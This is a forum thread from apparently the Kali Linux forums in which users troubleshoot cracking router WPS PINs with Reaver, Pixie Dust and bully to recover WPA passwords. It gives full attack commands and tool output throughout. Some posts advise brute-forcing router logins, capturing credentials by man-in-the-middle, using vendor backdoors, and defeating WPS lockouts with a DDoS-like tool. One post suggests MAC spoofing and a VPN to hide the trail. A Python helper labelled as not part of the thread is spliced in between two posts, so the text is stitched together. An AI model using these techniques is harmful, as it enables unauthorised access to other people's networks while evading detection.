Thread: Have the WPS Pin - but Reaver won't get the password.

  1. #1
    Join Date
    2015-Oct
    Posts
    1

    Have the WPS Pin - but Reaver won't get the password.

    I've been able to successfully crack WPS pins no problem using Pixie Dust - longest time so far is 9 secs...

    Typically I use ... reaver -i wlan0mon -b (bssid) -vv -w -N -A K 1

    ...with aireplay-ng -1 10 -a (bssid) wlan0mon

    ... in the background solving association problems.

    HOWEVER : )

    When I go to crack the password - reaver just sits there with the auto command that it generates - something along the lines of cmd: reaver -i wlan0mon -b (bssid) -c (channel number) -s y -p (8 digit pin)

    No warnings, no progress, it just sits there...

    Any recommendations are warmly welcomed. I just started three weeks ago and the addiction to Kali has begun : ) Thank you all.


  2. #2
    Join Date
    2015-Oct
    Location
    texas
    Posts
    6
    I was having the same problem, so I switched

    -vv to -vvv

    and this is what it came up with:

    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust] [+] WPS pin: 67047093
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i wlan0mon -b 90:1A:CA1:B8:80 -c 0 -s y -vv -p 67047093

    [Reaver Test] BSSID: 90:1A:CA1:B8:80
    [Reaver Test] Channel: 0
    ^C
    [+] Nothing done, nothing to save.
    root@kali:~# reaver -i wlan0mon -b 90:1A:CA1:B8:80 -c 0 -s y -vvv -p 67047093

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212

    [+] Waiting for beacon from 90:1A:CA1:B8:80
    [!] WARNING: Failed to associate with 90:1A:CA1:B8:80 (ESSID: Whiteside)
    [!] WARNING: Failed to associate with 90:1A:CA1:B8:80 (ESSID: Whiteside)

    I posted asking why it might not associate after I have already got the WPS pin, but no replies on it yet.

    I might try

    aireplay-ng -1 10 -a (bssid) wlan0mon

    and see if that changes anything.

  3. #3
    Join Date
    2013-Apr
    Location
    Kali forums
    Posts
    805
    If you've got the pin, you could try using bully to get the password. Not really an answer to your questions, I know, but an alternative.

  4. #4
    Join Date
    2015-Aug
    Location
    The Pits
    Posts
    87
    Some wise unix-er once told me, "USE YOUR EYES." lol
    So look at the channel that Pixie Dust is sending Reaver to:
    "Cmd : reaver -i wlan0mon -b 90:1A:CA1:B8:80 -c 0 -s y -vv -p 67047093"
    Just change that to the CORRECT channel and run Reaver with the pin that Pixie found. Problem solved!

  5. #5
    Join Date
    2016-Aug
    Posts
    2
    I used the command reaver -i wlan0mon -b (bssid) -vv -w -N -A K 1
    But nothing happens and the agenda does not
    But when -k 1 is not used, the command works.
    Please help me with how to use -k 1.

  6. #6
    Some wise unix-er once told me, "USE YOUR EYES." lol

    + 1
    And check the help in shell to understand the arguments... (just with your eyes)
    But nothing happens and the agenda does not
    But when -k 1 is not used, the command works.
    Please help me with how to use -k 1.
    Code:
    -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom & Realtek)
    So if you use K1 all the time you will just do a pixiedust attack and will never get the key.
    Pixiedust uses M1, M2 and M3 and doesn't go beyond M4.
    You need to make a full WPS transaction to retrieve the key.

  7. #7
    Join Date
    2016-Aug
    Posts
    2
    I'm still working around Pixiedust.
    I use reaver 1.5.3
    and it gives this:
    reaver -i mon0 -b bssid -r 1:20 -vvv --pixie-dust 1

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    [+] Waiting for beacon from bssid
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Associated with bssid
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: xxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] PKE: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxff
    [P] PKR: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] AuthKey:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [+] Sending M2 message
    [P] E-Hash1: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] E-Hash2:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.2
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s 749 ms
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    [+]
    do work now ??
    Please help me.

  8. #8
    Join Date
    2016-Sep
    Posts
    8
    Quote Originally Posted by pur3vil View Post
    I've been able to successfully crack WPS pins no problem using Pixie Dust - longest time so far is 9 secs...

    Typically I use ... reaver -i wlan0mon -b (bssid) -vv -w -N -A K 1

    ...with aireplay-ng -1 10 -a (bssid) wlan0mon

    ... in the background solving association problems.

    HOWEVER : )

    When I go to crack the password - reaver just sits there with the auto command that it generates - something along the lines of cmd: reaver -i wlan0mon -b (bssid) -c (channel number) -s y -p (8 digit pin)

    No warnings, no progress, it just sits there...

    Any recommendations are warmly welcomed. I've just started three weeks ago and the addiction to Kali has begun : ) Thank you all.

    Hi there, I have been having the same issue. Have you found an answer to this yet? I am totally stuck.

  9. #9
    Go to GitHub, search bully and get AanarchyY's version. Once installed, use -d and you should be fine.

  10. #10
    Join Date
    2016-Sep
    Posts
    8
    Quote Originally Posted by bob79 View Post
    go to github, search bully and get AanarchyY's version. once installed, use -d and you should be fine
    Thanks for the advice. I am using Kali rolling 16.1, which has bully already installed; there is no -d switch (-D is there, but that is only for detectlock, which I am not sure is what is required to resolve this one).

  11. #11
    Quote Originally Posted by vinneth View Post
    thanks for the advice, I am using Kali rolling 16.1, which has bully already installed, no -d switch (-D is there but that is only for detectlock which I am not sure is what is required to resolve this one)
    That's the official bully. As told, follow the steps above and install the other version.

  12. #12
    Join Date
    2015-Aug
    Location
    The Pits
    Posts
    87
    Thanks bob79, I downloaded that bully.

    RE: Rev1500's post: Again, use your eyes, see: [Reaver Test] Channel: 0
    So you should run reaver directly with the pin, using the correct channel number. However, if you use wash first you may find the router is currently locked, as I have seen routers locked by running pixiewps against them.
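An added example (not code from the thread or from Reaver) that applies the "use your eyes" advice of posts #4 and #12 to the generated "Cmd :" line, and also shows the WPS PIN checksum behind the "Max pin attempts: 11000" in post #7. The second sample line, with channel 1 and a six-octet BSSID, is constructed to show the check passing; the channel and BSSID in it are assumptions.

```python
import re

# Constructed samples: the auto-generated command quoted in posts #2, #4 and #12,
# and a hypothetical corrected version (channel 1 and a six-octet BSSID are assumed).
SAMPLE_LINES = [
    "Cmd : reaver -i wlan0mon -b 90:1A:CA1:B8:80 -c 0 -s y -vv -p 67047093",
    "Cmd : reaver -i wlan0mon -b 90:1A:CA:01:B8:80 -c 1 -s y -vv -p 67047093",
]

BSSID_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

def wps_pin_checksum(first7):
    """Checksum digit of a WPS PIN (public WPS spec): weighted digit sum mod 10."""
    d = [int(c) for c in first7]
    acc = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - acc % 10) % 10

def wps_pin_is_valid(pin):
    """True for an 8-digit PIN whose last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_pin_checksum(pin[:7]) == int(pin[7])

def pin_search_space():
    """Why post #7 shows 'Max pin attempts: 11000': the AP's reply to M4 already
    tells whether the first four digits were right, so the halves are confirmed
    separately, and the second half has only three free digits plus the checksum."""
    return 10 ** 4 + 10 ** 3

def _opt(line, flag, pattern=r"\S+"):
    """Value following a short option such as '-b' in a reaver command line."""
    m = re.search(r"(?<!\S)" + re.escape(flag) + r"\s+(" + pattern + ")", line)
    return m.group(1) if m else None

def check_reaver_cmd(line):
    """Return the problems found in a 'Cmd : reaver ...' line as short codes."""
    problems = []
    bssid = _opt(line, "-b")
    if bssid is None or not BSSID_RE.match(bssid):
        problems.append("bad-bssid")    # not six two-hex-digit octets
    channel = _opt(line, "-c", r"\d+")
    if channel is None or int(channel) < 1:
        problems.append("bad-channel")  # '-c 0' is what posts #4 and #12 spotted
    pin = _opt(line, "-p", r"\d+")
    if pin is None or not wps_pin_is_valid(pin):
        problems.append("bad-pin")      # wrong length or checksum digit
    return problems

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(line, "->", check_reaver_cmd(line) or "ok")
```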

  13. #13
    Join Date
    2015-Feb
    Posts
    1
    I have a similar problem. Have the pin, but no pw. Tried running bully with -d switch, but got the error that no WPS was found, even though it was within the string: bully -b 48:f8:b3:af:bd:76 -p 43077465 -B -c 1 wlan0mon -L d

    So trying to run it without the d switch, but keep getting timeouts. Same with reaver: reaver -i wlan0mon -b 48:f8:b3:af:bd:76 -c 1 -s y -vv -p 43077465

    Router is a Linksys EA2700. Stumped.

  14. #14
    Join Date
    2013-Jul
    Posts
    844
    To shockme17

    When using reaver MTeams has seen this occur for the following:

    1. The Network is not WPA encrypted

    2. The MAC has been spoofed thru either macchanger or done by NetworkManager, but the spoofed MAC address was not added to the reaver command line thru the --pin= command. We suggest running airodump-ng against the target by setting the channel -c and the --bssid of the target in the airodump-ng command line along with reaver, and checking the MAC address being used by reaver as it tries to collect WPS pins, which will be listed in the ESSID probes at the bottom of the airodump-ng terminal window.

    3. Reaver is being run in kali-rolling. When reaver was run thru kali 1.10a the WPA code was immediately obtained. MTeams keeps a persistent usb available running 1.10a for cases such as this which in fact occurred again just last week.

    Musket Teams

  15. #15
    Join Date
    2016-Dec
    Posts
    9
    mmusket33
    Very insightful information, thanks. Since we're on the topic of the WPS/password connection, which tool will return the WPS pin when you have the password?

  16. #16
    Join Date
    2013-Jul
    Posts
    844
    To gmaslin

    To our knowledge there is no tool to convert the WPA Key to a WPS Pin directly.

    MTeams asked for this tool when WPS-Reaver was functioning.

    You can get this indirectly of course thru reaver-pixiedust if the firmware is vulnerable.

    Since you have the WPA key you could try accessing the router, go into the setup pages and read the WPS. Many routers are left in the default setting. We have found that ITT companies' employees in our areas of operation who service clients and set up router software for customers tend to load standard passwords, so when they return to fix a problem they can easily access the firmware as their clients forget the password.

    1. Best use burpsuitepro for brute force

    or

    2. MITM the router and get the username/password pair if a client accesses the router. We find Windows and Cain to be the easiest tools to use here.

    3. Then there are back doors - TP link has one you can find the howto in the forums.


    MTeams
    Last edited by mmusket33; 2016-12-04 at 05:32.

  17. #17
    Join Date
    2016-Dec
    Posts
    9
    mmusket33
    Noted. I guess the best practice would be to spoof your MAC and use a VPN before going into the router directly to find the WPS pin so as to obfuscate the trail. I have one additional question: What is the command to start multiple wireless monitor interfaces from a single card? Better yet, will you point me to the favored practice of unlocking the WPS AP in the latest stable Kali release?

  18. #18
    Join Date
    2013-Jul
    Posts
    844
    To gmaslin

    For multiple monitors go to the end of this thread


    https://forums.kali.org/showthread.p...ewer-airmon-ng

    Making a monitor with airmon-ng and then making more off of wlan0mon with iw seems best. We are still testing; this is the last suggestion in the thread.


    For WPS locked routers it depends on how the firmware locks the router. If it is time based meaning the router unlocks after x amount of time then you can set up reaver to restart a little time after the router unlocks.

    To find if the WPS locking is time-based, set the -l lock-delay in seconds to, say, 600 seconds or 10 minutes. If the router's WPS was unlocked, start reaver, then lock the router thru pin collection and count the number of attempts reaver made before WPS pin collection was again successful. Each attempt would equal 600 seconds, so if 10 attempts were made then the lock/unlock cycle is approx 6000 seconds. Now set your -l to a little past that, say 6500 sec, and slowly collect pins. Watch the pin collection and refine your time as appropriate.

    If the router locks after x number of pin attempts and stays locked then see if it contains a pixiedust vulnerability.

    If unlocked collect a pixiedust data sequence and test it.

    If the router is locked just run up varmacscan (a MTeams tool available for download thru these forums) when your computer is idle and let it search. If the router unlocks then varmacscan will collect pins and check for the WPS pin thru pixiedust. If the flaw exists and the WPS pin is found then you can just run reaver against the router constantly until it unlocks. Varmacscan may also find the WPA key as well.

    Finally

    For locked WPS systems MTeams produces a tool called VMR-MDK, BUT the VMR-MDK process only works with a SMALL number of routers. Essentially these routers, if subjected to a short but intense DDOS process, release a small number of pins.

    Musket Teams

  19. #19
    Join Date
    2016-Dec
    Posts
    9
    mmusket33
    Thanks! I'll be starting another thread with my adjacent questions.

  20. #20
    Join Date
    2015-Jul
    Location
    Around the World
    Posts
    7


    @mmusket33
    I have been testing your "varmacscan", but after updating to "Kali Linux 2016.2" the tool seems to have a problem starting "wlan0" in monitor mode (tried both ways). I have even tried to write a small shell file to overcome this, but the problem still persists. It would be better if you add the following to avoid the hard-blocked case or "SIOCSIFFLAGS: Operation not possible due to RF-kill", so that the program doesn't have a problem with it while creating the "Monitor Mode".
    And can you say the command you use in the file with reaver and also aireplay-ng?
    Code:
    rmmod -f <Wifi Driver Name> #Removing the driver
    rfkill unblock all #Unblocking all devices
    modprobe <Wifi Driver Name> #Installing the driver module.

    Thanks.
    Last edited by 9h05t; 2016-12-12 at 20:01.

  21. #21
    Join Date
    2014-Mar
    Posts
    163
    For those that got the pin and can't get the password, the best way is to try to connect to the AP with the pin itself using WPS.
    The setup could be a little tricky, but if the pin is right then you probably will be able to access the AP router.

    Here is how it must be done.
    http://askubuntu.com/questions/12036...ap-through-wps

    Monitor the AP for a while with airmon-ng and write down somewhere the MAC addresses of the clients that connect successfully to that AP, just in case the AP has MAC filtering.

  22. #22
    Join Date
    2014-Mar
    Posts
    163
    I got here some APs where I could only get the pin with reaver, and I was able to catch the password of those APs using wpa_gui.

    Basically all that is needed is to use wpa_gui, register the AP and connect using the pin.
    When wpa makes the connection to the access point using the pin, it will register that AP in wpa_supplicant.conf in the /etc/wpa_supplicant folder.
    After the whole process is done, all you need is to open the wpa_supplicant.conf file and you will see the AP registered there along with that AP's password.

    Sometimes what happens for reaver not getting the password is that you may have a very long distance to the AP, and communication can fail.

  23. #23
    I guess you mean wpa_cli and not wpa_gui
